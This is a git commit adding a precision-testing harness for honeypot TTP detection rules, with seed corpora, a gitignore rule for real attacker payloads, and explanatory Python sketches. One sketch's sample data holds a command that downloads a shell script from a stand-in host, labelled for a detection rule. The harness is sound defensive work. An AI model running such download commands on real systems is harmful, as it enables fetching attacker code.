feat(ttp): E.3.8 corpus + harness — labelled holdout fixture

Sub-step preceding the rule-pack commits per TTP_TAGGING.md:2967.
Adds the per-rule precision suite scaffolding under
tests/ttp/rule_precision/:

- conftest.py: precision_engine fixture (RuleEngine populated from
  ./rules/ttp/), corpus_loader (real → seed → empty fallback),
  precision_for() helper for TP/FP accounting.
- _build_corpus.py: extractor for a real prod corpus pull. Requires
  --exclude-ip or DECNET_TTP_CORPUS_EXCLUDE_IPS, so operator IPs are
  supplied at run time and never end up in a committed exclusion
  list. Pulls both 'command' and 'unknown_command' event types.
- corpus/seed_*.jsonl: synthetic seed rows for each cohort so the
  harness still runs in clean checkouts.
- corpus/*.jsonl (operator-built) is gitignored.
- test_corpus_loads.py: sentinel test asserting that every seed file
  parses.
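Rough sketch of the loader fallback (real → seed → empty) and the TP/FP accounting described above. Not the code in conftest.py: load_cohort and rule_precision are hypothetical stand-ins for corpus_loader and precision_for(), and the row schema ("command", "expected"), the cohort name "shell", and the toy engine are assumptions made for illustration only.

```python
import json
import tempfile
from pathlib import Path
from typing import Callable, Optional


def load_cohort(corpus_dir: Path, cohort: str) -> list[dict]:
    """Real pull first, then the committed seed file, then an empty list."""
    for name in (f"{cohort}.jsonl", f"seed_{cohort}.jsonl"):
        path = corpus_dir / name
        if path.is_file():
            with path.open(encoding="utf-8") as fh:
                # One JSON object per non-blank line.
                return [json.loads(line) for line in fh if line.strip()]
    return []


def rule_precision(rule_id: str, rows: list[dict],
                   fired: Callable[[dict], set]) -> Optional[float]:
    """TP / (TP + FP) for one rule; None if the rule never fired."""
    tp = fp = 0
    for row in rows:
        if rule_id not in fired(row):
            continue  # rule silent on this row: irrelevant to precision
        if rule_id in row.get("expected", []):
            tp += 1   # fired and the label agrees
        else:
            fp += 1   # fired but the label disagrees
    total = tp + fp
    return tp / total if total else None


def demo():
    # Assumed row schema; the technique IDs are only illustrative labels.
    seed_rows = [
        {"command": "wget http://203.0.113.5/a.sh", "expected": ["T1105"]},
        {"command": "wget --version", "expected": []},
        {"command": "uname -a", "expected": ["T1082"]},
    ]

    def toy_engine(row: dict) -> set:
        # Stand-in for a rule engine: tags anything that mentions wget.
        return {"T1105"} if "wget" in row["command"] else set()

    with tempfile.TemporaryDirectory() as tmp:
        corpus = Path(tmp)
        (corpus / "seed_shell.jsonl").write_text(
            "\n".join(json.dumps(r) for r in seed_rows) + "\n",
            encoding="utf-8",
        )
        rows = load_cohort(corpus, "shell")              # falls back to seed
        missing = load_cohort(corpus, "no_such_cohort")  # falls back to []
    return (
        len(rows),
        missing,
        rule_precision("T1105", rows, toy_engine),
        rule_precision("T1082", rows, toy_engine),
    )


if __name__ == "__main__":
    print(demo())
```

In this sketch a rule that never fires yields None rather than 0.0, so a silent rule is not mistaken for an imprecise one. Whether the real helper makes the same choice is not stated here.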
2026-05-01 09:08:07 -04:00
parent ed3f340ea8
commit c635478442
10 changed files with 442 additions and 0 deletions

6
.gitignore vendored

@@ -57,3 +57,9 @@ deps.txt
# build/deploy time.
node_modules/
package-lock.json
# TTP rule-precision corpus pulled from prod sqlite. Real attacker
# payloads — operator-only artifact. The synthetic ``seed_*.jsonl``
# files alongside ARE committed and exercise the harness in CI.
tests/ttp/rule_precision/corpus/*.jsonl
!tests/ttp/rule_precision/corpus/seed_*.jsonl
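The two patterns above rely on gitignore's "last matching pattern wins" rule, with a leading ! re-including a path. A simplified model of just that interaction follows. It is not git's matcher: fnmatchcase lets * cross "/" where gitignore does not, which makes no difference for the paths tried here. The file names shell.jsonl and seed_shell.jsonl are hypothetical.

```python
from fnmatch import fnmatchcase

PATTERNS = [
    "tests/ttp/rule_precision/corpus/*.jsonl",
    "!tests/ttp/rule_precision/corpus/seed_*.jsonl",
]


def is_ignored(path: str, patterns=PATTERNS) -> bool:
    """Apply patterns in order; the last one that matches decides."""
    ignored = False
    for pattern in patterns:
        negate = pattern.startswith("!")
        glob = pattern[1:] if negate else pattern
        if fnmatchcase(path, glob):
            ignored = not negate
    return ignored


if __name__ == "__main__":
    base = "tests/ttp/rule_precision/corpus/"
    for name in ("shell.jsonl", "seed_shell.jsonl"):
        print(name, is_ignored(base + name))
```

Order matters: with the two lines swapped, the broader *.jsonl rule would match last and the seed files would be ignored as well.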